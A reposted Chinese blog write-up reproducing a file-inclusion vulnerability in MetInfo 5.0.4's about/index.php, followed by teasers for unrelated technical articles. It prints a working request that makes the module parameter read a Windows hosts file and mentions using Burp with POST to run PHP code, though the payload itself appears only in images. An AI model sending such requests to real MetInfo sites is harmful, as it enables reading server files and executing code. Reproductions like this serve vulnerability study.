[漏洞复现] MetInfo5.0.4文件包含漏洞

news2024/11/26 17:41:26

[漏洞复现] MetInfo5.0.4文件包含漏洞

MetInfo5.0.4

在这里插入图片描述

漏洞代码审计

漏洞出现在about/index.php中,因为利用了动态地址,所以存在漏洞。

在这里插入图片描述

漏洞检查语句(!192.168.109.100是我的服务器ip,需要换成自己的):

http://192.168.109.100/MetInfo5.0.4/about/index.php?module=c:/windows/system32/drivers/etc/hosts&fmodule=7

结果:

在这里插入图片描述

漏洞利用

可以使用burp工具对漏洞进行利用

把GET模式改为POST,执行PHP代码

行利用

把GET模式改为POST,执行PHP代码

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1873124.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[BUUCTF从零单排] Web方向 02.Web入门篇之『常见的搜集』解题思路(dirsearch工具详解)

[BUUCTF从零单排] Web方向 02.Web入门篇之『常见的搜集』解题思路(dirsearch工具详解)

这是作者新开的一个专栏《BUUCTF从零单排》,旨在从零学习CTF知识,方便更多初学者了解各种类型的安全题目,后续分享一定程度会对不同类型的题目进行总结,并结合CTF书籍和真实案例实践,希望对您有所帮助。当然&#xff0…
阅读更多...
jupyter安装及使用

jupyter安装及使用

引言 之前安装了anaconda,然后conda的环境管理里面就有jupyter,但是我一直没用过。 但是我用过colab,从使用体验上来说,非常相似,这次给服务器装了一个jupyter,然后我本地连接远程的来用,还挺…
阅读更多...
一种502 bad gateway nginx/1.18.0的解决办法

一种502 bad gateway nginx/1.18.0的解决办法

背景:上线的服务突然挂掉了 step1,去后端日志查看,发现并无异常,就是请求无法被接收 step2,查看了nginx的错误日志,发现该文件为空 step3,查看了niginx的运行日志,发现了以下问题 [error] 38#…
阅读更多...
C++ 106 之 list容器

C++ 106 之 list容器

#include <iostream> #include <string> using namespace std; // #include <vector> // 容器头文件 #include <algorithm> // 标准算法头文件 #include <list>void printList(const list<int> & list1){for(list<int>::const…
阅读更多...
半小时速通Python爬虫!GitHub开源的Python爬虫入门教程

半小时速通Python爬虫!GitHub开源的Python爬虫入门教程

今天给小伙伴们带来了一篇详细介绍 Python 爬虫入门的教程&#xff0c;从实战出发&#xff0c;适合初学者。 小伙伴们只需在阅读过程紧跟文章思路&#xff0c;理清相应的实现代码&#xff0c;30 分钟即可学会编写简单的 Python 爬虫。 这篇 Python 爬虫教程主要讲解以下 5 部…
阅读更多...
flutter开发实战-ListWheelScrollView与自定义TimePicker时间选择器

flutter开发实战-ListWheelScrollView与自定义TimePicker时间选择器

flutter开发实战-ListWheelScrollView与自定义TimePicker 最近在使用时间选择器的时候&#xff0c;需要自定义一个TimePicker效果&#xff0c;当然这里就使用了ListWheelScrollView。ListWheelScrollView与ListView类似&#xff0c;但ListWheelScrollView渲染效果类似滚筒效果…
阅读更多...
招聘,短信与您:招聘人员完整指南

招聘,短信与您:招聘人员完整指南

招聘人员面临的最大挑战之一就是沟通和联系候选人。为何?我们可以从以下原因开始&#xff1a;候选人通常被太多的招聘人员包围&#xff0c;试图联系他们&#xff0c;这使得你很难吸引他们的注意。在招聘过程的不同阶段&#xff0c;根据不同的工作量&#xff0c;让申请人保持最…
阅读更多...
墨刀原型-单选按钮场景交互

墨刀原型-单选按钮场景交互

画原型过程中&#xff0c;会遇到单选或多选的交互场景 这时就可以直接在基础组件部分&#xff0c;拉取单选按钮直接使用&#xff0c;只需要完成对应的交互事件就可实现交互 首先先说单选按钮实现交互 拉取一个单选组件&#xff0c;右侧可调整样式尺寸&#xff0c;在选项部分&…
阅读更多...
OpenGL3.3_C++_Windows(23)

OpenGL3.3_C++_Windows(23)

伽ga马校正 物理亮度 光子数量 线性空间&#xff1a;光子数(亮度&#xff09;和颜色值的线性关系人眼感知的亮度&#xff1a;对比较暗的颜色变化更敏感&#xff0c;感知亮度基于人的感觉非线性空间&#xff1a;光子数(亮度&#xff09;和 颜色值^2.2&#xff0c;恰好符合屏幕…
阅读更多...
Navicat数据库软件免费了!推出Navicat Premium Lite

Navicat数据库软件免费了!推出Navicat Premium Lite

2024年6月26日&#xff0c;数据库管理工具领域的知名品牌Navicat&#xff0c;推出其免费版本——Navicat Premium Lite&#xff0c;用户可从Navicat官网下载体验这款软件。 这款针对入门级用户的数据库管理开发工具&#xff0c;支持基础的数据库管理和协同合作功能&#xff0c…
阅读更多...
仓颉开发入门初体验

仓颉开发入门初体验

作者&#xff1a;黄林晴 顺便吆喝一声&#xff0c;如果你计算机、软件工程、电子等相关专业本科及以上学历&#xff0c;欢迎来共事。前端/后端/测试均可投&#xff0c;技术大厂。 前言 在刚刚召开的华为开发者大会&#xff08;HDC 2024&#xff09;上&#xff0c;华为内部研…
阅读更多...
观测到“量子反常霍尔效应”,为何就被称为“离诺奖最近的物理学家”?

观测到“量子反常霍尔效应”,为何就被称为“离诺奖最近的物理学家”?

内容来源&#xff1a;量子前哨&#xff08;ID&#xff1a;Qforepost&#xff09; 文丨浪味仙 排版丨沛贤 深度好文&#xff1a;2000字丨8分钟阅读 6 月 24 日&#xff0c;2023 年度国家最高科学技术奖在京揭晓&#xff0c;61岁的凝聚态物理领域科学家、清华大学薛其坤院士荣…
阅读更多...
基于改进天鹰优化算法(IAO)优化BP神经网络数据分类预测(IAO-BP)

基于改进天鹰优化算法(IAO)优化BP神经网络数据分类预测(IAO-BP)

改进天鹰优化算法(IAO)见&#xff1a;【智能优化算法】改进的AO算法(IAO)-CSDN博客 BP神经网络的数据分类预测&#xff1a;基于BP神经网络的数据分类预测-CSDN博客 代码原理 基于改进天鹰优化算法&#xff08;IAO&#xff09;优化BP神经网络数据分类预测&#xff08;IAO-BP&…
阅读更多...
win系统缺少vcruntime140.dll文件的解决办法,亲测实用的解决方法

win系统缺少vcruntime140.dll文件的解决办法,亲测实用的解决方法

运行软件的时候提示无法启动此程序&#xff0c;因为计算机中丢失 vcruntime140.dll 尝试重新安装该程序以解决此问题&#xff0c;其实主要因为vcruntime140.dll丢失&#xff0c;如果您启动程序并收到 Windows 无法找到 vcruntime140.dll DLL 或它丢失的错误&#xff0c;您可以使…
阅读更多...
# Kafka_深入探秘者(10):kafka 监控

# Kafka_深入探秘者(10):kafka 监控

Kafka_深入探秘者&#xff08;10&#xff09;&#xff1a;kafka 监控 一、kafka JMX 1、JMX &#xff1a;全称 Java Managent Extension 在实现 Kafka 监控系统的过程中&#xff0c;首先我们要知道监控的数据从哪来&#xff0c;Kafka 自身提供的监控指标(包括 broker 和主题的…
阅读更多...
如何进行员工 OKR 反馈?

如何进行员工 OKR 反馈?

目标和关键结果框架是一种协作性的目标设定方法&#xff0c;帮助团队设定理想的目标&#xff08;目标&#xff09;&#xff0c;并有具体的、可衡量的行动项目&#xff0c;称为关键结果。实施 OKR 为一个富有成效的、以目标为导向的环境奠定了基础&#xff0c;从而消除了提供反馈…
阅读更多...
报名通道开启!2024国际燃气轮机运维大会将于10月登陆花城

报名通道开启!2024国际燃气轮机运维大会将于10月登陆花城

驱动未来运维技术革新 共筑燃机生态新纪元 | 2024国际燃气轮机运维大会报名通道正式开启 随着全球燃气轮机装备技术不断升级与“双碳”战略的深入&#xff0c;全球燃气轮机市场规模也将进一步扩大&#xff0c;预计到2033年达到536.7亿美元左右&#xff0c;2023-2033年预测期间年…
阅读更多...
关于FPGA对 DDR4 (MT40A256M16)的读写控制 4

关于FPGA对 DDR4 (MT40A256M16)的读写控制 4

关于FPGA对 DDR4 &#xff08;MT40A256M16&#xff09;的读写控制 4 语言 &#xff1a;Verilg HDL 、VHDL EDA工具&#xff1a;ISE、Vivado、Quartus II 关于FPGA对 DDR4 &#xff08;MT40A256M16&#xff09;的读写控制 4一、引言二、DDR4 SDRAM设备中模式寄存器重要的模式寄存…
阅读更多...
普元MDM主数据管理系统与金蝶云星空ERP系统(企业版)集成方案(工程机械行业)

普元MDM主数据管理系统与金蝶云星空ERP系统(企业版)集成方案(工程机械行业)

一、客户介绍 某工程机械行业龙头公司业务范围包括工程机械、矿山机械、农业机械、环卫机械、应急救援装备和商用汽车、现代服务业等&#xff0c;产品远销190多个国家和地区&#xff0c;覆盖“一带一路”沿线95%以上的国家和地区&#xff0c;年出口总额和海外收入持续居中国行…
阅读更多...
10种超强图像特征提取算法Python代码实现

10种超强图像特征提取算法Python代码实现

声明&#xff1a;文章是从本人公众号中复制而来&#xff0c;因此&#xff0c;想最新最快了解各类算法的家人&#xff0c;可关注我的VX公众号&#xff1a;python算法小当家&#xff0c;不定期会有很多免费代码分享~ 图像特征提取是计算机视觉和图像处理的关键步骤&#xff0c;因…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023